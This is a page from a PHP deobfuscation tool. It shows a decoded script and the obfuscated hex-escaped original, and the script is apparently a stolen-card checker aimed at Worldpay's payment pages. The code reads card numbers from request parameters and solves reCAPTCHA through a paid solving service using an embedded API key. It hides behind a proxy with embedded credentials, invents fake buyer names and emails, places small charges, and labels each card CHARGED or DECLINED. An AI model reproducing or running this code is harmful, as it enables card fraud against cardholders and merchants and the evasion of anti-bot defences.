Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

goto sXUCk; of4f7: curl_setopt_array($ch, array(CURLOPT_URL => "\150\x74\x74\x70\x73\x3..

Decoded Output download

<?   
 goto sXUCk; of4f7: curl_setopt_array($ch, array(CURLOPT_URL => "https://secure.worldpay.com/wcc/purchase", CURLOPT_USERAGENT => $_SERVER["HTTP_USER_AGENT"], CURLOPT_CUSTOMREQUEST => "POST", CURLOPT_RETURNTRANSFER => 1, CURLOPT_COOKIEFILE => $cookies, CURLOPT_COOKIEJAR => $cookies, CURLOPT_PROXY => $proxy, CURLOPT_PROXYUSERPWD => $proxyuserpwd, CURLOPT_POSTFIELDS => http_build_query(array("instId" => "1198429", "cartId" => "AKPAY", "currency" => "GBP", "testmode" => 0, "desc" => "#" . rand(10000000, 99999999) . "-", "M_recipient" => "[email protected]", "M_subject" => "ORDER FROM WORLDPAY", "fake_amount" => 5, "card_type" => "debit_card", "invoice" => rand(10000000, 99999999), "name" => implode(" ", array($firstname, $lastname)), "email" => $email, "address" => "Unit 13 Ashford Business Centre", "country" => "GB", "postcode" => "TW15 1YQ", "amount" => "5.00")))); goto kkBaM; oEWFb: retry: goto T7BaT; xrmnC: $result = curl_exec($ch); goto kT3vw; rlOdq: curl_close($ch); goto RaPxR; f8kQ9: $email = str_shuffle(substr($firstname, 0, 6) . "_" . substr($lastname, 0, 6)) . rand(100, 999) . $domain[array_rand($domain)]; goto m0zA1; Mtai8: $default = htmlentities($result); goto uSqVk; uSqVk: if (strpos($result, "Thank you, your payment was successful.")) { response("CHARGED", $card, "AUTH_MSG = 0000"); } elseif (strpos($result, "Challenge") || $result == NULL || strpos($result, "Access Denied") || strpos($result, "No payment information is available")) { if ($count < 5) { $count++; goto retry; } } elseif ($message == TRUE) { response("DECLINED", $card, "MSG = FAILURE ({$count})"); } else { response("DECLINED", $card, "MSG = DO NOT RETRY (MAX RETRIES)"); } goto VBieC; Nmkf5: curl_exec($ch); goto pXfhW; TdVY4: extract($_GET); goto FTj0w; sXUCk: ini_set("max_execution_time", "0"); goto doprp; q4Vza: switch (TRUE) { case $cc[0] == "3" && strlen($cc) == 15: $brand = "AMEX"; break; case $cc[0] == "3": $brand = "JCB"; break; case $cc[0] == "4": $brand = "VISA"; break; case $cc[0] == "5": $brand = "ECMC"; break; } goto b_qMj; MKa_c: $message = misaka($result, "<li>", "</li>"); goto Mtai8; T7BaT: $ch = curl_init(); goto jpzJH; rYLfu: $m = ltrim($mm, "0"); goto hho_8; doprp: ini_set("error_reporting", E_ERROR | E_PARSE); goto LyYUu; kQ9U2: $yy = substr($yyyy, 2, 2); goto DhKtG; SZur3: strlen($yyyy) == 2 ? $yyyy = "20" . $yyyy : NULL; goto kQ9U2; mY9Lw: $domain = array("@gmail.com", "@outlook.com", "@yahoo.com"); goto f8kQ9; sSfMt: $ch = curl_init(); goto SNveu; LyYUu: $cookies = getcwd() . "/cookies/COOKIE_" . mt_rand(1000, 9999) . ".txt"; goto ZmdUc; QJrjp: curl_setopt_array($ch, array(CURLOPT_URL => "https://secure.worldpay.com/wcc/card?PaymentID=" . base64_encode($PaymentID) . "&Lang=en&DispatcherID=" . implode("-", array_slice(explode("-", $PaymentID), 0, 3)) . "&op-PMInitial=", CURLOPT_USERAGENT => $_SERVER["HTTP_USER_AGENT"], CURLOPT_CUSTOMREQUEST => "GET", CURLOPT_RETURNTRANSFER => 1, CURLOPT_COOKIEFILE => $cookies, CURLOPT_COOKIEJAR => $cookies, CURLOPT_PROXY => $proxy, CURLOPT_PROXYUSERPWD => $proxyuserpwd)); goto UwQJ9; qdgCk: $taskId = json_decode($result)->taskId; goto f0lar; b_qMj: function misaka($string, $string1, $string2) { return trim(explode($string2, explode($string1, $string)[1])[0]); } goto vJ1V4; FTj0w: list($cc, $mm, $yyyy, $cvc) = explode("|", preg_replace("/[^0-9|]+/", '', $card)); goto rYLfu; jXw1p: curl_setopt_array($ch, array(CURLOPT_URL => "https://secure.worldpay.com/wcc/purchase", CURLOPT_USERAGENT => $_SERVER["HTTP_USER_AGENT"], CURLOPT_CUSTOMREQUEST => "POST", CURLOPT_RETURNTRANSFER => 1, CURLOPT_COOKIEFILE => $cookies, CURLOPT_COOKIEJAR => $cookies, CURLOPT_PROXY => $proxy, CURLOPT_PROXYUSERPWD => $proxyuserpwd, CURLOPT_POSTFIELDS => http_build_query(array("PaymentID" => $PaymentID, "Lang" => "en", "authCurrency" => "GBP", "op-DPChoose-VISA^SSL.x" => "27", "op-DPChoose-VISA^SSL.y" => "30")))); goto Nmkf5; jpzJH: curl_setopt_array($ch, array(CURLOPT_URL => "https://api.capsolver.com/createTask", CURLOPT_USERAGENT => $_SERVER["HTTP_USER_AGENT"], CURLOPT_CUSTOMREQUEST => "POST", CURLOPT_RETURNTRANSFER => 1, CURLOPT_HTTPHEADER => array("Host: api.capsolver.com", "Content-Type: application/json"), CURLOPT_POSTFIELDS => json_encode(array("clientKey" => "CAP-C8B710353B6D14C864E8CFA597C8463F", "task" => array("type" => "RecaptchaV2TaskProxyless", "websiteURL" => "https://secure.worldpay.com/", "websiteKey" => "6LfWIQcUAAAAAHK_CgpruJ8BHouCe6Xp1EH-i8Nn"))))); goto hpT_p; BhmAv: $ch = curl_init(); goto QJrjp; UwQJ9: curl_exec($ch); goto bdv2D; DhKtG: $card = "{$cc}|{$mm}|{$yyyy}|{$cvc}"; goto q4Vza; kT3vw: curl_close($ch); goto MKa_c; VJRo3: $ch = curl_init(); goto jXw1p; hho_8: $mm === "10" ? $m = "10" : $mm; goto SZur3; m0zA1: $ch = curl_init(); goto of4f7; vj3xN: $firstname = randomStrings(8); goto wDzhe; ZmdUc: fwrite(fopen($cookies, "w"), ''); goto TdVY4; vJ1V4: function response($string, $string1, $string2) { return die(implode(" | ", array($string, $string1, $string2)) . "<br>"); } goto QLAbS; SNveu: curl_setopt_array($ch, array(CURLOPT_URL => "https://secure.worldpay.com/wcc/card", CURLOPT_USERAGENT => $_SERVER["HTTP_USER_AGENT"], CURLOPT_CUSTOMREQUEST => "POST", CURLOPT_RETURNTRANSFER => 1, CURLOPT_COOKIEFILE => $cookies, CURLOPT_COOKIEJAR => $cookies, CURLOPT_PROXY => $proxy, CURLOPT_PROXYUSERPWD => $proxyuserpwd, CURLOPT_POSTFIELDS => http_build_query(array("PaymentID" => $PaymentID, "Lang" => "en", "cardNoInput" => $cc, "cardNoHidden" => "*hidden*", "cardExp.day" => "32", "cardExp.time" => "23:59:59", "cardExp.month" => $m, "cardExp.year" => $yyyy, "name" => implode(" ", array($firstname, $lastname)), "address" => "Unit 13 Ashford Business Centre", "postcode" => "TW15 1YQ", "country" => "GB", "email" => $email, "g-recaptcha-response" => $gRecaptchaResponse, "colourDepth" => 24, "screenHeight" => 768, "screenWidth" => 1366, "language" => "en-US", "timeZone" => "-480", "op-PMMakePayment" => "Submit Query")))); goto xrmnC; kkBaM: $result = curl_exec($ch); goto rlOdq; hpT_p: $result = curl_exec($ch); goto Asbnz; bdv2D: curl_close($ch); goto sSfMt; GlCZA: $proxyuserpwd = "rmpttlhlie-cc-gb-sessid-6639209273979-sesstime-30:31cqo72j63k232y"; goto vj3xN; RaPxR: $PaymentID = misaka($result, "NAME=PaymentID VALUE="", """); goto VJRo3; xL1B7: $count = 0; goto oEWFb; pXfhW: curl_close($ch); goto BhmAv; f0lar: while (TRUE) { $ch = curl_init(); curl_setopt_array($ch, array(CURLOPT_URL => "https://api.capsolver.com/getTaskResult", CURLOPT_USERAGENT => $_SERVER["HTTP_USER_AGENT"], CURLOPT_CUSTOMREQUEST => "POST", CURLOPT_RETURNTRANSFER => 1, CURLOPT_HTTPHEADER => array("Host: api.capsolver.com", "Content-Type: application/json"), CURLOPT_POSTFIELDS => json_encode(array("clientKey" => "CAP-C8B710353B6D14C864E8CFA597C8463F", "taskId" => $taskId)))); $result = curl_exec($ch); curl_close($ch); $status = json_decode($result)->status; $gRecaptchaResponse = json_decode($result)->solution->gRecaptchaResponse; if ($status == "processing") { continue; } break; } goto GOpcY; GOpcY: $proxy = "oxy.proxycue.com:3000"; goto GlCZA; wDzhe: $lastname = randomStrings(8); goto mY9Lw; Asbnz: curl_close($ch); goto qdgCk; QLAbS: function randomStrings($string) { $characters = implode('', range("a", "z")) . implode('', range("A", "Z")); $length = strlen($characters); $word = ''; for ($string1 = 0; $string1 <= $string; $string1++) { $word .= $characters[mt_rand(0, $length)]; } return $word; } goto xL1B7; VBieC:    ?>

Did this file decode correctly?

Original Code


 goto sXUCk; of4f7: curl_setopt_array($ch, array(CURLOPT_URL => "\150\x74\x74\x70\x73\x3a\57\57\163\145\x63\165\162\x65\56\x77\157\x72\154\144\x70\x61\171\x2e\x63\157\x6d\x2f\167\x63\143\57\x70\165\x72\x63\150\141\163\145", CURLOPT_USERAGENT => $_SERVER["\x48\x54\x54\x50\x5f\125\x53\x45\x52\137\101\x47\x45\116\x54"], CURLOPT_CUSTOMREQUEST => "\x50\117\x53\124", CURLOPT_RETURNTRANSFER => 1, CURLOPT_COOKIEFILE => $cookies, CURLOPT_COOKIEJAR => $cookies, CURLOPT_PROXY => $proxy, CURLOPT_PROXYUSERPWD => $proxyuserpwd, CURLOPT_POSTFIELDS => http_build_query(array("\151\156\x73\x74\111\144" => "\61\x31\71\x38\64\x32\x39", "\x63\x61\x72\x74\x49\x64" => "\x41\113\120\x41\x59", "\x63\165\162\x72\x65\x6e\x63\171" => "\x47\102\120", "\x74\145\x73\164\155\157\144\145" => 0, "\144\145\x73\x63" => "\43" . rand(10000000, 99999999) . "\x2d", "\115\x5f\x72\145\143\151\x70\x69\x65\x6e\164" => "\155\x61\151\154\100\x61\165\163\x74\151\x6e\x6b\145\x6d\x70\x2e\143\157\x2e\165\153", "\x4d\x5f\163\165\142\152\x65\x63\164" => "\117\x52\104\x45\x52\x20\x46\122\x4f\115\40\x57\x4f\122\114\x44\120\101\131", "\146\141\x6b\145\137\x61\155\x6f\165\156\x74" => 5, "\x63\x61\x72\144\x5f\164\x79\160\x65" => "\x64\x65\x62\x69\164\x5f\x63\x61\162\144", "\151\156\x76\157\151\143\x65" => rand(10000000, 99999999), "\x6e\x61\155\145" => implode("\x20", array($firstname, $lastname)), "\x65\155\141\x69\x6c" => $email, "\x61\144\144\x72\145\163\x73" => "\125\x6e\x69\x74\40\61\63\x20\x41\163\150\146\157\x72\x64\40\x42\x75\x73\151\156\145\x73\x73\x20\103\145\156\164\162\x65", "\143\157\x75\156\164\162\x79" => "\107\x42", "\x70\157\x73\164\x63\x6f\x64\x65" => "\124\127\x31\x35\40\x31\x59\x51", "\x61\155\157\165\156\164" => "\x35\56\60\x30")))); goto kkBaM; oEWFb: retry: goto T7BaT; xrmnC: $result = curl_exec($ch); goto kT3vw; rlOdq: curl_close($ch); goto RaPxR; f8kQ9: $email = str_shuffle(substr($firstname, 0, 6) . "\x5f" . substr($lastname, 0, 6)) . rand(100, 999) . $domain[array_rand($domain)]; goto m0zA1; Mtai8: $default = htmlentities($result); goto uSqVk; uSqVk: if (strpos($result, "\124\150\x61\x6e\x6b\40\171\157\165\x2c\40\171\x6f\x75\x72\x20\x70\x61\171\155\145\156\164\x20\x77\141\x73\x20\x73\x75\x63\x63\x65\163\163\146\165\154\56")) { response("\x43\110\x41\122\107\x45\x44", $card, "\x41\125\124\x48\137\x4d\123\x47\x20\75\x20\60\60\60\60"); } elseif (strpos($result, "\x43\150\x61\x6c\x6c\x65\x6e\x67\145") || $result == NULL || strpos($result, "\x41\x63\143\145\163\x73\40\104\145\x6e\x69\145\144") || strpos($result, "\x4e\157\x20\x70\141\x79\x6d\145\x6e\x74\40\x69\x6e\x66\x6f\x72\x6d\x61\x74\151\157\156\40\x69\x73\40\141\166\141\151\154\x61\x62\154\x65")) { if ($count < 5) { $count++; goto retry; } } elseif ($message == TRUE) { response("\x44\105\x43\114\111\116\105\104", $card, "\x4d\x53\107\x20\x3d\40\106\x41\x49\114\125\x52\105\40\50{$count}\x29"); } else { response("\x44\x45\103\x4c\111\116\x45\104", $card, "\x4d\123\x47\x20\75\40\x44\x4f\x20\x4e\x4f\124\40\x52\x45\124\122\x59\40\50\115\x41\130\40\x52\105\124\122\111\105\x53\x29"); } goto VBieC; Nmkf5: curl_exec($ch); goto pXfhW; TdVY4: extract($_GET); goto FTj0w; sXUCk: ini_set("\x6d\141\x78\137\x65\x78\x65\143\x75\164\151\x6f\156\137\164\151\x6d\x65", "\x30"); goto doprp; q4Vza: switch (TRUE) { case $cc[0] == "\63" && strlen($cc) == 15: $brand = "\x41\115\105\130"; break; case $cc[0] == "\63": $brand = "\x4a\103\102"; break; case $cc[0] == "\x34": $brand = "\x56\111\123\x41"; break; case $cc[0] == "\65": $brand = "\x45\x43\115\x43"; break; } goto b_qMj; MKa_c: $message = misaka($result, "\74\x6c\x69\76", "\74\x2f\154\151\76"); goto Mtai8; T7BaT: $ch = curl_init(); goto jpzJH; rYLfu: $m = ltrim($mm, "\x30"); goto hho_8; doprp: ini_set("\x65\162\x72\157\162\137\x72\x65\x70\157\162\164\151\x6e\147", E_ERROR | E_PARSE); goto LyYUu; kQ9U2: $yy = substr($yyyy, 2, 2); goto DhKtG; SZur3: strlen($yyyy) == 2 ? $yyyy = "\x32\x30" . $yyyy : NULL; goto kQ9U2; mY9Lw: $domain = array("\100\147\155\x61\151\154\x2e\143\157\155", "\100\x6f\x75\164\154\157\157\x6b\56\143\157\155", "\x40\171\141\x68\157\x6f\x2e\x63\x6f\x6d"); goto f8kQ9; sSfMt: $ch = curl_init(); goto SNveu; LyYUu: $cookies = getcwd() . "\57\143\157\x6f\x6b\151\x65\x73\x2f\x43\117\117\x4b\x49\x45\137" . mt_rand(1000, 9999) . "\x2e\164\170\164"; goto ZmdUc; QJrjp: curl_setopt_array($ch, array(CURLOPT_URL => "\150\x74\164\x70\x73\x3a\x2f\57\163\x65\x63\x75\162\x65\56\167\157\162\x6c\x64\x70\141\x79\x2e\143\x6f\155\57\167\143\143\57\143\141\162\144\x3f\x50\x61\x79\155\x65\x6e\164\111\104\75" . base64_encode($PaymentID) . "\x26\114\141\156\147\x3d\145\156\46\x44\151\163\160\x61\164\143\x68\x65\162\x49\104\x3d" . implode("\55", array_slice(explode("\x2d", $PaymentID), 0, 3)) . "\46\x6f\x70\x2d\x50\115\x49\x6e\x69\164\x69\x61\154\x3d", CURLOPT_USERAGENT => $_SERVER["\110\x54\124\120\x5f\x55\x53\x45\122\x5f\101\107\x45\x4e\124"], CURLOPT_CUSTOMREQUEST => "\107\105\x54", CURLOPT_RETURNTRANSFER => 1, CURLOPT_COOKIEFILE => $cookies, CURLOPT_COOKIEJAR => $cookies, CURLOPT_PROXY => $proxy, CURLOPT_PROXYUSERPWD => $proxyuserpwd)); goto UwQJ9; qdgCk: $taskId = json_decode($result)->taskId; goto f0lar; b_qMj: function misaka($string, $string1, $string2) { return trim(explode($string2, explode($string1, $string)[1])[0]); } goto vJ1V4; FTj0w: list($cc, $mm, $yyyy, $cvc) = explode("\174", preg_replace("\57\133\x5e\60\x2d\x39\174\135\53\x2f", '', $card)); goto rYLfu; jXw1p: curl_setopt_array($ch, array(CURLOPT_URL => "\x68\164\164\160\163\x3a\57\x2f\163\145\x63\x75\x72\x65\x2e\167\x6f\x72\154\x64\x70\141\x79\56\x63\157\x6d\x2f\x77\x63\x63\57\160\165\x72\143\x68\x61\x73\145", CURLOPT_USERAGENT => $_SERVER["\x48\124\124\120\x5f\125\x53\x45\x52\137\x41\107\105\x4e\124"], CURLOPT_CUSTOMREQUEST => "\120\117\x53\124", CURLOPT_RETURNTRANSFER => 1, CURLOPT_COOKIEFILE => $cookies, CURLOPT_COOKIEJAR => $cookies, CURLOPT_PROXY => $proxy, CURLOPT_PROXYUSERPWD => $proxyuserpwd, CURLOPT_POSTFIELDS => http_build_query(array("\x50\x61\x79\x6d\145\156\x74\111\104" => $PaymentID, "\x4c\x61\156\147" => "\145\156", "\141\165\x74\x68\103\x75\x72\x72\x65\x6e\143\171" => "\107\x42\120", "\x6f\x70\x2d\x44\x50\x43\x68\157\157\163\x65\55\x56\x49\x53\101\136\x53\123\x4c\x2e\170" => "\x32\x37", "\x6f\160\x2d\104\120\x43\x68\x6f\157\x73\x65\55\x56\111\123\x41\136\123\x53\114\x2e\171" => "\x33\x30")))); goto Nmkf5; jpzJH: curl_setopt_array($ch, array(CURLOPT_URL => "\150\x74\164\160\163\72\57\x2f\x61\160\151\x2e\143\141\160\163\157\x6c\x76\x65\162\x2e\143\157\x6d\x2f\x63\162\x65\141\164\145\124\x61\x73\153", CURLOPT_USERAGENT => $_SERVER["\110\124\x54\x50\137\x55\123\105\x52\137\101\107\x45\116\124"], CURLOPT_CUSTOMREQUEST => "\x50\117\x53\x54", CURLOPT_RETURNTRANSFER => 1, CURLOPT_HTTPHEADER => array("\x48\157\163\x74\x3a\40\141\160\151\x2e\x63\141\160\x73\157\x6c\166\145\162\56\143\157\155", "\x43\157\156\164\145\156\164\x2d\124\171\160\x65\x3a\x20\141\x70\160\x6c\151\x63\141\x74\151\157\x6e\57\152\163\157\156"), CURLOPT_POSTFIELDS => json_encode(array("\x63\x6c\151\x65\156\x74\113\145\x79" => "\103\101\120\55\103\70\102\x37\x31\x30\x33\x35\63\102\x36\x44\x31\x34\103\70\66\64\105\x38\103\x46\x41\x35\x39\x37\x43\70\64\x36\x33\106", "\x74\141\163\153" => array("\x74\x79\x70\145" => "\122\145\143\141\160\x74\143\150\x61\126\62\124\141\x73\x6b\x50\162\157\x78\171\x6c\145\x73\x73", "\x77\145\x62\163\151\x74\x65\x55\x52\114" => "\150\164\164\x70\x73\72\57\57\163\x65\x63\x75\162\145\x2e\x77\x6f\162\x6c\x64\x70\x61\x79\56\x63\x6f\155\x2f", "\167\145\142\x73\x69\x74\x65\x4b\145\x79" => "\x36\x4c\x66\127\x49\x51\143\x55\x41\x41\101\101\x41\x48\x4b\137\x43\x67\x70\162\165\x4a\70\102\110\x6f\x75\x43\145\x36\x58\160\x31\105\110\55\x69\70\116\x6e"))))); goto hpT_p; BhmAv: $ch = curl_init(); goto QJrjp; UwQJ9: curl_exec($ch); goto bdv2D; DhKtG: $card = "{$cc}\174{$mm}\174{$yyyy}\x7c{$cvc}"; goto q4Vza; kT3vw: curl_close($ch); goto MKa_c; VJRo3: $ch = curl_init(); goto jXw1p; hho_8: $mm === "\x31\x30" ? $m = "\x31\x30" : $mm; goto SZur3; m0zA1: $ch = curl_init(); goto of4f7; vj3xN: $firstname = randomStrings(8); goto wDzhe; ZmdUc: fwrite(fopen($cookies, "\x77"), ''); goto TdVY4; vJ1V4: function response($string, $string1, $string2) { return die(implode("\x20\x7c\x20", array($string, $string1, $string2)) . "\x3c\x62\x72\x3e"); } goto QLAbS; SNveu: curl_setopt_array($ch, array(CURLOPT_URL => "\x68\x74\164\x70\x73\x3a\x2f\x2f\163\x65\143\x75\162\x65\x2e\x77\x6f\x72\x6c\x64\160\x61\x79\x2e\x63\157\x6d\x2f\x77\143\x63\x2f\143\x61\x72\x64", CURLOPT_USERAGENT => $_SERVER["\x48\124\x54\x50\x5f\x55\x53\105\122\137\101\x47\x45\116\x54"], CURLOPT_CUSTOMREQUEST => "\120\x4f\x53\124", CURLOPT_RETURNTRANSFER => 1, CURLOPT_COOKIEFILE => $cookies, CURLOPT_COOKIEJAR => $cookies, CURLOPT_PROXY => $proxy, CURLOPT_PROXYUSERPWD => $proxyuserpwd, CURLOPT_POSTFIELDS => http_build_query(array("\120\141\x79\x6d\145\x6e\164\111\104" => $PaymentID, "\x4c\x61\x6e\x67" => "\x65\x6e", "\x63\141\162\144\x4e\157\x49\156\160\165\x74" => $cc, "\x63\x61\162\144\x4e\157\110\151\x64\144\x65\x6e" => "\x2a\x68\151\144\x64\145\156\52", "\143\141\x72\144\105\x78\x70\x2e\144\141\x79" => "\63\x32", "\x63\x61\162\144\x45\170\160\56\x74\x69\155\x65" => "\x32\x33\72\x35\71\x3a\x35\71", "\x63\141\162\x64\x45\170\160\56\x6d\x6f\156\x74\150" => $m, "\143\141\162\144\x45\x78\160\x2e\x79\145\141\162" => $yyyy, "\x6e\x61\155\x65" => implode("\40", array($firstname, $lastname)), "\141\144\144\162\x65\x73\x73" => "\125\x6e\151\x74\40\61\x33\40\x41\x73\150\x66\157\162\144\x20\102\165\x73\151\x6e\x65\163\x73\x20\x43\x65\x6e\x74\162\145", "\160\157\x73\164\143\157\144\x65" => "\124\127\61\x35\x20\x31\131\121", "\x63\x6f\165\156\164\162\x79" => "\107\102", "\145\155\x61\x69\154" => $email, "\x67\x2d\162\x65\x63\x61\x70\164\x63\150\x61\55\162\145\163\160\157\x6e\163\x65" => $gRecaptchaResponse, "\x63\157\x6c\157\x75\162\104\145\x70\x74\150" => 24, "\x73\x63\162\x65\145\x6e\x48\145\x69\147\x68\164" => 768, "\163\143\162\145\145\156\x57\151\x64\x74\x68" => 1366, "\x6c\141\156\147\x75\141\x67\x65" => "\145\156\x2d\125\x53", "\x74\x69\155\x65\132\157\x6e\x65" => "\55\64\70\60", "\x6f\160\x2d\120\x4d\x4d\x61\153\x65\x50\141\x79\155\x65\x6e\x74" => "\123\x75\142\x6d\x69\x74\x20\x51\165\x65\x72\171")))); goto xrmnC; kkBaM: $result = curl_exec($ch); goto rlOdq; hpT_p: $result = curl_exec($ch); goto Asbnz; bdv2D: curl_close($ch); goto sSfMt; GlCZA: $proxyuserpwd = "\x72\x6d\x70\164\164\x6c\150\x6c\x69\145\55\x63\x63\55\147\x62\55\x73\x65\163\x73\x69\144\55\x36\66\63\71\62\60\71\62\67\x33\x39\67\x39\55\x73\x65\163\x73\x74\151\x6d\145\55\63\60\x3a\63\x31\143\161\157\67\x32\152\66\x33\x6b\62\x33\x32\x79"; goto vj3xN; RaPxR: $PaymentID = misaka($result, "\x4e\101\115\x45\x3d\x50\141\171\155\x65\156\x74\111\104\40\x56\101\114\x55\x45\75\x22", "\42"); goto VJRo3; xL1B7: $count = 0; goto oEWFb; pXfhW: curl_close($ch); goto BhmAv; f0lar: while (TRUE) { $ch = curl_init(); curl_setopt_array($ch, array(CURLOPT_URL => "\x68\x74\x74\x70\163\72\x2f\57\141\160\x69\56\143\x61\160\163\x6f\154\166\x65\162\x2e\143\157\155\x2f\x67\145\x74\124\x61\163\153\122\145\163\165\x6c\164", CURLOPT_USERAGENT => $_SERVER["\x48\x54\124\x50\137\x55\123\x45\122\x5f\x41\x47\105\x4e\x54"], CURLOPT_CUSTOMREQUEST => "\120\x4f\x53\x54", CURLOPT_RETURNTRANSFER => 1, CURLOPT_HTTPHEADER => array("\110\157\163\x74\72\40\x61\x70\151\x2e\143\141\x70\x73\x6f\154\166\145\x72\56\143\157\x6d", "\x43\x6f\156\164\x65\x6e\164\55\x54\171\160\x65\72\x20\141\x70\x70\x6c\151\x63\141\164\151\x6f\x6e\57\152\163\x6f\156"), CURLOPT_POSTFIELDS => json_encode(array("\x63\154\151\x65\156\x74\x4b\145\171" => "\103\101\x50\x2d\103\70\x42\67\x31\60\63\x35\63\x42\x36\x44\x31\64\103\x38\x36\64\105\70\x43\106\101\65\71\x37\x43\70\x34\x36\63\106", "\164\x61\x73\x6b\x49\144" => $taskId)))); $result = curl_exec($ch); curl_close($ch); $status = json_decode($result)->status; $gRecaptchaResponse = json_decode($result)->solution->gRecaptchaResponse; if ($status == "\160\x72\157\x63\145\x73\163\151\156\147") { continue; } break; } goto GOpcY; GOpcY: $proxy = "\157\x78\171\x2e\160\x72\157\170\171\143\165\145\x2e\143\157\155\72\x33\x30\x30\60"; goto GlCZA; wDzhe: $lastname = randomStrings(8); goto mY9Lw; Asbnz: curl_close($ch); goto qdgCk; QLAbS: function randomStrings($string) { $characters = implode('', range("\x61", "\172")) . implode('', range("\101", "\x5a")); $length = strlen($characters); $word = ''; for ($string1 = 0; $string1 <= $string; $string1++) { $word .= $characters[mt_rand(0, $length)]; } return $word; } goto xL1B7; VBieC:   

Function Calls

None

Variables

None

Stats

MD5 9c98015df318e2f5c290f9d7157bbe02
Eval Count 0
Decode Time 58 ms